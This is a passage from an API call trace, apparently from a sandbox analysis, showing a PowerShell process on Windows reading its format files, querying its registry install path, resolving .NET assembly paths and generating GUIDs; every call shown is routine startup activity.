(hObject=0x340) returned 1 [0108.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0108.109] SetErrorMode (uMode=0x1) returned 0x1 [0108.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d000 | out: lpFileInformation=0x10d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0108.109] SetErrorMode (uMode=0x1) returned 0x1 [0108.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0108.109] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d0e8 | out: phkResult=0x10d0e8*=0x340) returned 0x0 [0108.109] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d06c, lpData=0x0, lpcbData=0x10d068*=0x0 | out: lpType=0x10d06c*=0x1, lpData=0x0, lpcbData=0x10d068*=0x56) returned 0x0 [0108.109] CoTaskMemAlloc (cb=0x5a) returned 0x2a1bc0 [0108.109] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d03c, lpData=0x2a1bc0, lpcbData=0x10d038*=0x56 | out: lpType=0x10d03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d038*=0x56) returned 0x0 [0108.110] CoTaskMemFree (pv=0x2a1bc0) [0108.110] RegCloseKey (hKey=0x340) returned 0x0 [0108.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0108.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0108.111] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xc1043974, Data2=0x3055, Data3=0x4748, Data4=([0]=0x87, [1]=0xdc, [2]=0x12, [3]=0xa8, [4]=0xb6, [5]=0xde, [6]=0x67, [7]=0xba))) returned 0x0 [0108.112] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x23b19c63, Data2=0x6984, Data3=0x4316, Data4=([0]=0x8a, [1]=0x31, [2]=0x4b, [3]=0x9c, [4]=0x42, [5]=0xb4, [6]=0x9f, [7]=0x1a))) returned 0x0 [0108.112] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xe429c16f, Data2=0xd5d7, Data3=0x4608, Data4=([0]=0xb7, [1]=0x85, [2]=0x59, [3]=0xa7, [4]=0xd0, [5]=0xa9, [6]=0x63, [7]=0x3d))) returned 0x0 [0108.113] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xc90fe6b4, Data2=0x5d99, Data3=0x468c, Data4=([0]=0xa7, [1]=0x30, [2]=0xeb, [3]=0x51, [4]=0x51, [5]=0x15, [6]=0x2c, [7]=0x3))) returned 0x0 [0108.113] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xae48c135, Data2=0xa364, Data3=0x4cb5, Data4=([0]=0xa9, [1]=0x27, [2]=0x77, [3]=0xcf, [4]=0xdc, [5]=0xbe, [6]=0x30, [7]=0xe0))) returned 0x0 [0108.113] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x6b909809, Data2=0xde11, Data3=0x4a13, Data4=([0]=0x83, [1]=0x30, [2]=0xc7, [3]=0xe9, [4]=0xc6, [5]=0xa8, [6]=0xda, [7]=0xe5))) returned 0x0 [0108.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0108.113] SetErrorMode (uMode=0x1) returned 0x1 [0108.113] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x340 [0108.113] GetFileType (hFile=0x340) returned 0x1 [0108.113] SetErrorMode (uMode=0x1) returned 0x1 [0108.113] GetFileType (hFile=0x340) returned 0x1 [0108.113] ReadFile (in: hFile=0x340, lpBuffer=0x33d2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x33d2ba0*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.118] ReadFile (in: hFile=0x340, lpBuffer=0x33d2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x33d2ba0*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.119] ReadFile (in: hFile=0x340, lpBuffer=0x33d2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x33d2ba0*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.121] ReadFile (in: hFile=0x340, lpBuffer=0x33d2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x33d2ba0*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.121] ReadFile (in: hFile=0x340, lpBuffer=0x33d2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x33d2ba0*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.121] ReadFile (in: hFile=0x340, lpBuffer=0x33d2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x33d2ba0*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.121] ReadFile (in: hFile=0x340, lpBuffer=0x33d2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x33d2ba0*, lpNumberOfBytesRead=0x10d058*=0xaca, lpOverlapped=0x0) returned 1 [0108.121] ReadFile (in: hFile=0x340, lpBuffer=0x33d21d2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x33d21d2*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0108.121] ReadFile (in: hFile=0x340, lpBuffer=0x33d2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x33d2ba0*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0108.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0108.122] SetErrorMode (uMode=0x1) returned 0x1 [0108.122] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d000 | out: lpFileInformation=0x10d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0108.122] SetErrorMode (uMode=0x1) returned 0x1 [0108.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0108.123] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d0e8 | out: phkResult=0x10d0e8*=0x340) returned 0x0 [0108.123] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d06c, lpData=0x0, lpcbData=0x10d068*=0x0 | out: lpType=0x10d06c*=0x1, lpData=0x0, lpcbData=0x10d068*=0x56) returned 0x0 [0108.123] CoTaskMemAlloc (cb=0x5a) returned 0x2a1bc0 [0108.123] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d03c, lpData=0x2a1bc0, lpcbData=0x10d038*=0x56 | out: lpType=0x10d03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d038*=0x56) returned 0x0 [0108.123] CoTaskMemFree (pv=0x2a1bc0) [0108.123] RegCloseKey (hKey=0x340) returned 0x0 [0108.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0108.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0108.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0108.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0108.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0108.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0108.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0108.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0108.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0108.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0108.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0108.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0108.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0108.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0108.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0108.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0108.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0108.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0108.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0108.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.348] VirtualQuery (in: lpAddress=0x10bb80, lpBuffer=0x10ca40, dwLength=0x30 | out: lpBuffer=0x10ca40*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.349] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x4428b68d, Data2=0x44f0, Data3=0x4b4a, Data4=([0]=0x9d, [1]=0xab, [2]=0x27, [3]=0x8b, [4]=0x16, [5]=0xe5, [6]=0x9f, [7]=0xaf))) returned 0x0 [0108.350] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x1c65b3a1, Data2=0xe465, Data3=0x4cc6, Data4=([0]=0x82, [1]=0x36, [2]=0x4, [3]=0x72, [4]=0xf7, [5]=0xd9, [6]=0xc0, [7]=0xbd))) returned 0x0 [0108.351] VirtualQuery (in: lpAddress=0x10bd30, lpBuffer=0x10cbf0, dwLength=0x30 | out: lpBuffer=0x10cbf0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.352] VirtualQuery (in: lpAddress=0x10bd30, lpBuffer=0x10cbf0, dwLength=0x30 | out: lpBuffer=0x10cbf0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.353] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xe3bf7010, Data2=0x860, Data3=0x4747, Data4=([0]=0x8d, [1]=0x6f, [2]=0xdb, [3]=0x48, [4]=0x23, [5]=0xaa, [6]=0x7a, [7]=0x0))) returned 0x0 [0108.358] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xa4d981aa, Data2=0x758, Data3=0x47b9, Data4=([0]=0xae, [1]=0xae, [2]=0xbe, [3]=0x9d, [4]=0x93, [5]=0xa, [6]=0xea, [7]=0x3e))) returned 0x0 [0108.358] VirtualQuery (in: lpAddress=0x10bf80, lpBuffer=0x10ce40, dwLength=0x30 | out: lpBuffer=0x10ce40*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.358] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.359] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.359] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xc7d757d, Data2=0xc8f7, Data3=0x443c, Data4=([0]=0x82, [1]=0xdd, [2]=0x44, [3]=0xdd, [4]=0x73, [5]=0x5f, [6]=0xe9, [7]=0x1f))) returned 0x0 [0108.359] VirtualQuery (in: lpAddress=0x10bf80, lpBuffer=0x10ce40, dwLength=0x30 | out: lpBuffer=0x10ce40*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.359] VirtualQuery (in: lpAddress=0x10bda0, lpBuffer=0x10cc60, dwLength=0x30 | out: lpBuffer=0x10cc60*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.360] VirtualQuery (in: lpAddress=0x10b5f0, lpBuffer=0x10c4b0, dwLength=0x30 | out: lpBuffer=0x10c4b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.360] VirtualQuery (in: lpAddress=0x10b5f0, lpBuffer=0x10c4b0, dwLength=0x30 | out: lpBuffer=0x10c4b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.361] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xa81df018, Data2=0x7d12, Data3=0x496e, Data4=([0]=0x9f, [1]=0x2f, [2]=0x8e, [3]=0x73, [4]=0x74, [5]=0x4f, [6]=0x9a, [7]=0x9e))) returned 0x0 [0108.361] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x70aa3348, Data2=0x964e, Data3=0x4416, Data4=([0]=0x83, [1]=0xfe, [2]=0x17, [3]=0xea, [4]=0x2e, [5]=0x4f, [6]=0x1d, [7]=0xf0))) returned 0x0 [0108.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0108.362] SetErrorMode (uMode=0x1) returned 0x1 [0108.362] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x340 [0108.362] GetFileType (hFile=0x340) returned 0x1 [0108.362] SetErrorMode (uMode=0x1) returned 0x1 [0108.362] GetFileType (hFile=0x340) returned 0x1 [0108.362] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.370] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.371] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.372] ReadFile (in: hFile=0x340, lpBuffer=0x3485198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3485198*, 